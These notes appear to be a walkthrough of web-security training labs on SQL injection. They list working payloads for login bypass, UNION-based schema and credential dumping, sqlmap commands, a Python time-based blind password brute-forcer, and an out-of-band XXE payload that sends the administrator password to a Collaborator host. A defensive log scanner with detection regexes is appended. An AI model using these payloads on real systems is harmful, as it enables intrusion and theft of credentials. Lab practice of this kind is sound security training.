lab1
girf' or 1=1--+
lab2
admin'+or 1=1--+  universal-password login bypass
lab3
GET /filter?category=Corporate+gifts'+UNION+SELECT+NULL,NULL+FROM+DUAL-- HTTP/2
SELECT version FROM v$instance returns only the version number.
SELECT banner FROM v$version returns the full version string the lab asks for.
lab4
GET /filter?category=Gifts'+UNION+SELECT+'abc',@@version# HTTP/2
select * from v$version
lab5
union+select+table_name,null+from+information_schema.tables--+
union+select+column_name,null+from+information_schema.columns+where+table_name='users_pohpev'--+
union+select+username_kjvmus,password_sasxqt+from+users_pohpev--+
Then just log in.
lab6
-1'+union+select+'a','b'+from+dual--+
-1'+union+select+table_name,'b'+from+all_tables--+  lists the table names across all schemas
-1'+union+select+column_name,'b'+from+all_tab_columns+where+table_name='USERS_UAZUWQ'--+
-1'+union+select+USERNAME_PFKISR,PASSWORD_SPTVBT+from+USERS_UAZUWQ--+
lab7
-Gifts'+union+select+1,null,null--+
lab8
The lab hint says one column contains the string 'wBC2wi'.
After testing, the string goes in the second position:
-Lifestyle'+union+select+1,'wBC2wi',null--+
lab9
-Gifts'+union+select+table_name,null+from+information_schema.tables--+
-Gifts'+union+select+column_name,null+from+information_schema.columns+where+table_name='users'--+
# This lab has two displayed columns, 1 and 2; testing shows the string does not work in position 2 but does in position 1.
-Gifts'+union+select+username,password+from+users--+
lab10
-Pets'+union+select+null,table_name+from+information_schema.tables--+
-Pets'+union+select+null,column_name+from+information_schema.columns+where+table_name='users'--+
-Pets'+union+select+null,username||'~'||password+from+users--+
lab11
sqlmap -u "https://0a45008e03f375b780de4e5700250052.web-security-academy.net/filter?category=Gifts" --cookie="TrackingId=4YfDIEEQzb8ONICd" -p "TrackingId" --level 3 -T users --columns
sqlmap -u "https://0a45008e03f375b780de4e5700250052.web-security-academy.net/filter?category=Gifts" --cookie="TrackingId=4YfDIEEQzb8ONICd" -p "TrackingId" --level 3 -T users -C username,password --dump
Blind injection: use sqlmap.
lab12
sqlmap -u "https://0a92008a03eaaa32802c6294002c00d7.web-security-academy.net/filter?category=Lifestyle" --cookie="TrackingId=Q3Ng4ep9s0d8oT7l" -p "TrackingId" --level 3 -T users --dump
lab13
'+AND+1%3dCAST((SELECT+username+FROM+users+LIMIT+1)+AS+int)--+
lab14
'||+pg_sleep(10)--  delays the response by 10 seconds
lab15
Inject at the TrackingId cookie parameter:
x'%3bselect+case+when+(1=1)+then+pg_sleep(3)+else+pg_sleep(0)+end--
%3b is ;
x'%3bselect+case+when+(1=2)+then+pg_sleep(3)+else+pg_sleep(0)+end--
With 1=2 there is no delay, so time-based blind injection is confirmed.
Check whether the username is administrator:
x'%3bselect+case+when+(username='administrator'+and+length(password)>1)+then+pg_sleep(3)+else+pg_sleep(0)+end+from+users--
Confirm that the password length is 20:
x'%3bselect+case+when+(username='administrator'+and+length(password)=20)+then+pg_sleep(3)+else+pg_sleep(0)+end+from+users--; session=j8O0Ct59oPsLampGr3alDnDXp38fISe8
Because in this lab the response length is 5335 whether the delay fires or not, Burp Intruder cannot tell the two cases apart by length, so the brute force is done with a Python script instead:
import string
import time

import requests

# Lab instance URL and the character set to test at each password position
url = 'https://0a5700cf0388d3dd81e9de2300260078.web-security-academy.net/filter?category=Gifts'
charset = string.ascii_lowercase + string.digits

password = ''
# The password length was confirmed above to be 20, so test positions 1..20
for p in range(1, 21):
    for i in charset:
        # Conditional delay: pg_sleep(5) runs only when the guessed character matches
        cookie = {
            'TrackingId': f"x'%3bselect+case+when+(username='administrator'+and+substring(password,{p},1)='{i}')+then+pg_sleep(5)+else+pg_sleep(0)+end+from+users--"}
        # Time the response: a delay of about 5 s means the guess was right
        start_time = time.time()
        response = requests.get(url, cookies=cookie)
        delay = time.time() - start_time
        if delay >= 4:
            password += i
            print(f"position {p}: {i}")
            break
print(f"password: {password}")
Recovered password: nb8n6ob1oodp1rtho04k
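As an added defensive check that is not part of this writeup: a small request-log scanner that URL-decodes the query and cookie fields and flags the payload classes used across these labs (UNION SELECT, version and schema enumeration, CAST error, pg_sleep timing, EXTRACTVALUE/ENTITY out-of-band), and correlates a sleep payload with the observed response time. The log line format, the sample lines and the PLACEHOLDER Collaborator host are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request log (not real traffic). Assumed format per line:
# "<path> <TrackingId cookie> <status> <response_ms>" (no raw spaces inside fields)
SAMPLE_LOG = [
    "/filter?category=Gifts TrackingId=abc123 200 41",
    "/filter?category=Gifts'+UNION+SELECT+'abc',@@version# TrackingId=abc123 500 39",
    "/filter?category=Pets'+union+select+null,table_name+from+information_schema.tables--+ TrackingId=abc123 200 57",
    "/filter?category=Gifts TrackingId=x'%3bselect+case+when+(1=1)+then+pg_sleep(3)+else+pg_sleep(0)+end-- 200 3042",
    "/filter?category=Gifts TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<!DOCTYPE+root+[<!ENTITY+%25+remote+SYSTEM+\"http%3a//PLACEHOLDER.burpcollaborator.net/\">%25remote%3b]>'),'/l')+FROM+dual-- 200 60",
    "/filter?category=Gifts TrackingId=abc'+AND+1%3dCAST((SELECT+username+FROM+users+LIMIT+1)+AS+int)-- 500 38",
    "/filter?category=Pets TrackingId=abc123 200 44",
]

# One regex per payload class seen in the labs; matched case-insensitively on decoded text
PATTERNS = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "version_probe": re.compile(r"@@version|v\$(version|instance)", re.I),
    "schema_enum": re.compile(r"information_schema\.(tables|columns)|\ball_tab(les|_columns)\b", re.I),
    "time_based": re.compile(r"\bpg_sleep\s*\(", re.I),
    "error_based": re.compile(r"\bcast\s*\(.+\bas\s+int\s*\)", re.I),
    "oob_xml": re.compile(r"extractvalue\s*\(\s*xmltype|<!ENTITY\b", re.I),
}

def decode(value, rounds=3):
    """Undo URL encoding repeatedly so %3b / %25-style nesting cannot hide keywords."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return status, response time and the payload classes matched by one log line."""
    path, cookie, status, ms = line.rsplit(" ", 3)
    text = decode(path + " " + cookie)
    tags = sorted(name for name, rx in PATTERNS.items() if rx.search(text))
    resp_ms = int(ms)
    # A sleep payload that actually stalled the backend is the strongest signal
    if "time_based" in tags and resp_ms >= 1000:
        tags.append("delay_confirmed")
    return {"status": int(status), "resp_ms": resp_ms, "tags": tags}

def scan(lines):
    # (line_number, result) for every line matching at least one payload class
    results = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return [(n, r) for n, r in results if r["tags"]]
```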
lab16
Click "Copy to clipboard" in Burp Collaborator: vgfhr4me01jj0mmvfk7ls924bvhn5ft4
TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//vgfhr4me01jj0mmvfk7ls924bvhn5ft4.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--
lab17
Copy the Collaborator payload to the clipboard.
Put it into the payload below:
x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.lti74uz4drw9dczlsakb5zfuoludi66v.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--
lab18
Capture the stock-check request.
Encode `1 union select null`.
Install the Hackvertor extension.
Select the statement, right-click > Extensions > Hackvertor > Encode > hex-entities.
The injection point is string-based.
1 union select username ||'~'|| password from users